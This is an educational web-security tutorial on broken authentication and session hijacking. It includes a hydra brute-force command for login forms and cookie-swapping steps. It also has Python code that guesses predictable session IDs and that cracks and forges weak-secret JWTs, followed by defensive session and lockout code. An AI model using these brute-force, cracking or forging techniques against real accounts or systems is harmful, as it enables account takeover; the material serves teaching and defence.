Broken Authentication & Session Hijacking

💡 Introduction

Authentication is how users prove who they are; session management is how the app remembers that proof between requests. If either is broken, an attacker no longer needs your password. They simply become you.

In this part, you’ll learn how to:

  • ✅ Brute-force weak login forms

  • ✅ Exploit poor session handling

  • ✅ Hijack cookies and impersonate users

  • ✅ Prevent these issues as a developer

⚠️ What Is Broken Authentication?

A vulnerability that allows attackers to:

  • Bypass login

  • Steal or forge session tokens

  • Reuse leaked credentials

  • Stay logged in as someone else

Often caused by:

  • Weak password policies

  • No rate limiting

  • Insecure session cookies

  • Exposed tokens

🧪 Brute-Forcing Login Forms

Try brute-forcing common credentials first:

admin / admin  
admin / password  
user / 123456

Use Burp Suite Intruder or:

hydra -l admin -P rockyou.txt <target> http-post-form "/login.php:username=^USER^&password=^PASS^:Invalid"

Replace <target> with the host or IP of the app. The last field (Invalid) is the string Hydra expects to see on a failed login; set it to whatever the app actually returns on failure, or Hydra will report every guess as a hit.

Look for:

  • No lockouts

  • No CAPTCHA

  • No rate limiting

🍪 Session Hijacking via Cookies

If session tokens are predictable, or are sent and stored without protection, whoever holds a valid token is that user. To prove it to yourself with two test accounts:

Steps:

  1. Log in as the victim account (user A) and grab the Set-Cookie header from the response, e.g.:

PHPSESSID=abcd1234

  2. In a separate browser or profile, log in as your own account (user B)

  3. Replace user B's session cookie with the value captured from user A

  4. Refresh → the app now treats you as user A, no password required

In a real attack the token is obtained some other way: sniffed from an unencrypted connection (no Secure flag), read by injected JavaScript (no HttpOnly flag), or simply guessed when IDs are predictable.

Tools:

  • Burp Suite Proxy & Repeater

  • Firefox Cookie Editor
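The "predictable" case is worth seeing in code. The following is an added example, not from the original post: a constructed stand-in for an app whose session ID is derived from the login time, and the attacker routine that guesses it. Class and function names (VulnerableApp, hijack_by_guessing, weak_session_id) are invented for the illustration.

```python
import hashlib
import secrets


# Constructed vulnerable generator (not from the original post): the session ID
# is just MD5 of the login time in seconds, so it has only a few hundred
# plausible values once the attacker knows roughly when the victim logged in.
def weak_session_id(login_time: int) -> str:
    return hashlib.md5(str(login_time).encode()).hexdigest()


class VulnerableApp:
    """Minimal stand-in for a PHP app that issues PHPSESSID-style cookies."""

    def __init__(self):
        self.sessions = {}  # session id -> username

    def login(self, username: str, now: int) -> str:
        sid = weak_session_id(now)
        self.sessions[sid] = username
        return sid  # would go out as Set-Cookie: PHPSESSID=<sid>

    def whoami(self, sid: str):
        # What /profile.php does with the presented cookie: nothing binds it to
        # the client, the cookie alone is the identity.
        return self.sessions.get(sid)


def hijack_by_guessing(app: VulnerableApp, approx_login_time: int, window: int = 300):
    """Attacker side: derive the cookie for every second within +/- window of
    the victim's approximate login time and present each one to the app."""
    for t in range(approx_login_time - window, approx_login_time + window + 1):
        candidate = weak_session_id(t)
        user = app.whoami(candidate)
        if user is not None:
            return candidate, user, t  # hijacked cookie, victim, exact login second
    return None


def strong_session_id() -> str:
    # What the generator should look like: 32 bytes from the OS CSPRNG,
    # far beyond anything an attacker can enumerate.
    return secrets.token_urlsafe(32)


if __name__ == "__main__":
    app = VulnerableApp()
    victim_cookie = app.login("alice", 1_700_000_042)  # victim logs in
    hit = hijack_by_guessing(app, 1_700_000_000)  # attacker only knows "around then"
    print("hijacked:", hit)
    print("strong id:", strong_session_id())
```

The attacker never touches the victim's browser; a rough idea of when they logged in plus 601 requests is enough. With strong_session_id() the same search space is 2^256 and the approach is hopeless.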

💉 Insecure Token Example

Some apps pass the auth token in the URL:

/profile.php?auth=eyJhbGciOiJIUzI1NiJ9...

A token in a query string ends up in browser history, proxy and server logs, and the Referer header sent to other sites. Given a token like this, attackers might:

  • Replay it: present the same token themselves, since nothing ties it to the original client

  • Decode it: the eyJ... prefix is a JWT, whose header and payload are only base64url-encoded, not encrypted, so every claim (and any credentials an app was careless enough to embed) is readable without the key

  • Crack it: an HS256 signature made with a weak secret can be brute-forced offline against a wordlist, after which the attacker can forge tokens with any claims they like
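To make the decode-and-crack bullets concrete, here is an added example (not code from the original post) that mints an HS256 JWT with a weak secret, reads its claims without the key, recovers the secret from a small constructed wordlist standing in for rockyou.txt, and forges an admin token. The helper names and the sample claims are assumptions made for the illustration.

```python
import base64
import hashlib
import hmac
import json


def b64url_encode(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def make_jwt(payload: dict, secret: str) -> str:
    """Mint an HS256 JWT the way a simple app would."""
    header = {"alg": "HS256", "typ": "JWT"}
    signing_input = (
        b64url_encode(json.dumps(header, separators=(",", ":")).encode())
        + "."
        + b64url_encode(json.dumps(payload, separators=(",", ":")).encode())
    )
    sig = hmac.new(secret.encode(), signing_input.encode(), hashlib.sha256).digest()
    return signing_input + "." + b64url_encode(sig)


def decode_unverified(token: str):
    """Header and payload are only base64url-encoded, not encrypted: anyone
    holding the token can read every claim without knowing the secret."""
    header_b64, payload_b64, _ = token.split(".")
    return json.loads(b64url_decode(header_b64)), json.loads(b64url_decode(payload_b64))


def verify_hs256(token: str, secret: str) -> bool:
    """Recompute the HMAC and compare in constant time. A real verifier must
    also pin the expected alg instead of trusting whatever the header says."""
    header_b64, payload_b64, sig_b64 = token.split(".")
    expected = hmac.new(secret.encode(), f"{header_b64}.{payload_b64}".encode(), hashlib.sha256).digest()
    return hmac.compare_digest(expected, b64url_decode(sig_b64))


def crack_secret(token: str, candidates):
    """Offline dictionary attack: no requests to the server, just HMACs."""
    for candidate in candidates:
        if verify_hs256(token, candidate):
            return candidate
    return None


def forge(token: str, secret: str, **new_claims) -> str:
    """Once the secret is known, rewrite claims and re-sign."""
    _, payload = decode_unverified(token)
    payload.update(new_claims)
    return make_jwt(payload, secret)


# Constructed sample: a token the app signed with a weak secret, and a small
# wordlist standing in for rockyou.txt.
WEAK_TOKEN = make_jwt({"sub": "alice", "role": "user", "exp": 1_700_003_600}, "secret123")
WORDLIST = ["password", "123456", "admin", "changeme", "secret123", "letmein"]

if __name__ == "__main__":
    print(decode_unverified(WEAK_TOKEN))
    found = crack_secret(WEAK_TOKEN, WORDLIST)
    print("secret:", found)
    admin_token = forge(WEAK_TOKEN, found, role="admin")
    print("forged verifies:", verify_hs256(admin_token, found))
```

Note that the cracking loop runs entirely offline: the server sees nothing until the forged token is presented, so rate limiting on the login form does not help. Only a long random secret (or an asymmetric algorithm with the private key kept server-side) defeats it.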

🔥 Exploiting “Remember Me” Features

Poorly implemented “Remember Me” can:

  • Store unhashed passwords in cookies

  • Reuse the same token for every session

  • Allow token replay

🧰 Practice Targets

  • DVWA → Brute Force module

  • bWAPP → Insecure Login, Session Fixation

  • Juice Shop → Broken Auth, JWT Bugs

🛡️ How to Prevent Broken Authentication

From the dev side:

✅ Use:

  • Strong password policies

  • Multi-Factor Authentication (MFA)

  • Secure session cookies (HttpOnly, Secure, SameSite)

  • JWTs with strong secrets and expiry

  • Rate limiting + CAPTCHA

🚫 Avoid:

  • Hardcoded or default credentials

  • Tokens that don’t expire

  • GET requests for login/session management
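The following is an added example, not code from the original post, that puts the defensive checklist above together with the lockout the brute-forcing section told you to look for: random server-side session IDs, a Set-Cookie header with HttpOnly, Secure and SameSite, session rotation at login, expiry, salted password hashing, and a sliding-window failure counter that locks a (user, IP) pair out after repeated failures. The thresholds, class names and the constructed user record are assumptions for the illustration.

```python
import hashlib
import hmac
import secrets
import time
from collections import deque

SESSION_TTL = 30 * 60  # idle session lifetime, seconds
MAX_FAILURES = 5       # failures per (user, ip) inside WINDOW before lockout
WINDOW = 5 * 60
LOCKOUT = 15 * 60


def _hash_password(password: str, salt: bytes) -> bytes:
    # PBKDF2-HMAC-SHA256; production should use a higher count or argon2/bcrypt.
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)


# Constructed user table: salt + hash, never the password itself.
_ALICE_SALT = secrets.token_bytes(16)
USERS = {"alice": (_ALICE_SALT, _hash_password("correct horse battery staple", _ALICE_SALT))}


def check_password(username: str, password: str) -> bool:
    record = USERS.get(username)
    if record is None:
        _hash_password(password, b"\x00" * 16)  # same cost for unknown users (no timing oracle)
        return False
    salt, stored = record
    return hmac.compare_digest(_hash_password(password, salt), stored)


class SessionStore:
    """Server-side sessions keyed by an unguessable random token."""

    def __init__(self):
        self._sessions = {}

    def create(self, username: str, now: float) -> str:
        token = secrets.token_urlsafe(32)  # 256 bits from the OS CSPRNG
        self._sessions[token] = {"user": username, "expires": now + SESSION_TTL}
        return token

    def user_for(self, token: str, now: float):
        entry = self._sessions.get(token)
        if entry is None or entry["expires"] <= now:
            self._sessions.pop(token, None)  # expired tokens are gone for good
            return None
        entry["expires"] = now + SESSION_TTL  # sliding expiry
        return entry["user"]

    def rotate(self, old_token, username: str, now: float) -> str:
        # Fresh ID at login, so a token fixed or captured before
        # authentication is worthless afterwards (session fixation defence).
        self._sessions.pop(old_token, None)
        return self.create(username, now)


def set_cookie_header(token: str) -> str:
    # HttpOnly: not readable by script. Secure: HTTPS only. SameSite: not sent cross-site.
    return f"session={token}; Path=/; HttpOnly; Secure; SameSite=Strict; Max-Age={SESSION_TTL}"


class LoginGuard:
    """Sliding-window failure counter with temporary lockout per (user, ip)."""

    def __init__(self):
        self._failures = {}
        self._locked_until = {}

    def allowed(self, key, now: float) -> bool:
        return self._locked_until.get(key, 0) <= now

    def record_failure(self, key, now: float) -> None:
        q = self._failures.setdefault(key, deque())
        q.append(now)
        while q and q[0] < now - WINDOW:
            q.popleft()
        if len(q) >= MAX_FAILURES:
            self._locked_until[key] = now + LOCKOUT
            q.clear()

    def record_success(self, key) -> None:
        self._failures.pop(key, None)
        self._locked_until.pop(key, None)


def login(username, password, client_ip, store, guard, presented_token=None, now=None):
    """Returns (session_token, status); status is 'ok', 'invalid' or 'locked_out'."""
    now = time.time() if now is None else now
    key = (username, client_ip)
    if not guard.allowed(key, now):
        return None, "locked_out"
    if not check_password(username, password):
        guard.record_failure(key, now)
        return None, "invalid"  # same message for bad user and bad password
    guard.record_success(key)
    return store.rotate(presented_token, username, now), "ok"


if __name__ == "__main__":
    store, guard = SessionStore(), LoginGuard()
    t0 = time.time()
    for i in range(7):  # the hydra run from earlier, seen from the server
        print(i, login("alice", f"guess{i}", "10.0.0.9", store, guard, now=t0 + i)[1])
    tok, status = login("alice", "correct horse battery staple", "10.0.0.9", store, guard, now=t0 + LOCKOUT + 100)
    print(status, set_cookie_header(tok))
```

Locking per (user, IP) rather than per user alone keeps an attacker from locking legitimate users out on purpose; pair it with a global per-IP limit and CAPTCHA after a few failures so credential stuffing across many accounts is also throttled.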

🔚 Wrapping Up

You’ve learned how attackers:

  • Brute-force weak credentials

  • Hijack sessions via cookies

  • Abuse poor session management

And how to secure your apps against all of it.

👉 Up Next:
Part 9 – Cross-Site Request Forgery (CSRF): Hijacking Sessions Silently

This is where attackers trick users into making unwanted requests while logged in — silently and dangerously.
